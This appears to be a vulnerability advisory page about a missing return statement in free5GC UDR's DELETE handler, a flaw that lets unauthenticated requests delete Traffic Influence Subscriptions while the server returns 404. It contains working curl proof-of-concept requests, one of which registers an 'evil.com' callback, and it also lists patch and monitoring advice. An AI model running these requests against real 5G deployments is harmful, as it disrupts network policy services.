free5GC UDR, Improper Path Validation, CVE(not disclosed) (medium)

Listen to this Post

The vulnerability exists in the free5GC UDR service’s DELETE endpoint: /nudr-dr/v2/application-data/influenceData/{influenceId}/{subscriptionId}. The handler is designed to only accept `influenceId` exactly equal to "subs-to-notify". In the function `HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdDelete` inside ./free5gc_4-2-1/free5gc/NFs/udr/internal/sbi/api_datarepository.go, the code checks if influenceId != "subs-to-notify". If true, it calls `c.String(http.StatusNotFound, “404 page not found”)` but does not return after that call. Execution then proceeds to s.Processor().ApplicationDataInfluenceDataSubsToNotifySubscriptionIdDeleteProcedure(c, subscriptionId), which deletes the subscription identified by `subscriptionId` regardless of the invalid path. An attacker sends a DELETE request with an arbitrary `influenceId` (e.g., WRONGID) and a valid subscriptionId. The server responds with HTTP 404 Not Found, misleading the attacker into thinking the operation failed, but the subscription is actually deleted. The missing `return` statement after the 404 response is the root cause. No authentication is required; only network access to the 5G Service Based Interface (SBI) and a valid `subscriptionId` (obtainable via a prior POST request) is needed. The vulnerability allows unauthenticated unauthorized deletion of Traffic Influence Subscriptions, disrupting policy notification workflows. The patch adds a `return` statement after sending the 404 response.

DailyCVE form:

Platform: free5GC UDR
Version: 4.2.1 (affected)
Vulnerability: Improper path validation
Severity: Medium
date: 2026-04-14

Prediction: Patch already available

Analytics under What Undercode Say:

Check vulnerable handler behavior
grep -A5 'HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdDelete' free5gc/NFs/udr/internal/sbi/api_datarepository.go
Simulate missing return vulnerability
curl -X DELETE "http://<udr-host>/nudr-dr/v2/application-data/influenceData/WRONGID/87615e16" -v
Observe 404 but subscription deleted
Verify deletion
curl -X GET "http://<udr-host>/nudr-dr/v2/application-data/influenceData/subs-to-notify/87615e16" -v

Exploit:

Create subscription to get valid subscriptionId
curl -X POST "http://<udr-host>/nudr-dr/v2/application-data/influenceData/subs-to-notify" \
-H "Content-Type: application/json" \
-d '{"notificationUri":"http://evil.com/notify","dnns":["internet"],"supis":["imsi-222777483957498"]}'
Capture subscriptionId from 201 response
Delete via invalid path
curl -X DELETE "http://<udr-host>/nudr-dr/v2/application-data/influenceData/ANYTHING/<subscriptionId>"
Receives 404 but deletion successful

Protection from this CVE

  • Apply the official patch: add `return` after `c.String(http.StatusNotFound, “404 page not found”)` in api_datarepository.go.
  • Restrict SBI access using network segmentation (firewall, VLANs) to prevent untrusted parties from reaching the UDR.
  • Monitor logs for DELETE requests to invalid `influenceId` values followed by subscription state changes.
  • Upgrade free5GC to a version containing the fix (post-4.2.1).

Impact

  • Unauthenticated attacker deletes any Traffic Influence Subscription with known/guessed subscriptionId.
  • Disrupts policy notifications, removes active subscription state, and causes misleading 404 responses that hide the attack.
  • Affects any free5GC deployment where the SBI is exposed to untrusted networks (e.g., misconfigured segmentation, rogue NF, compromised internal host).

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top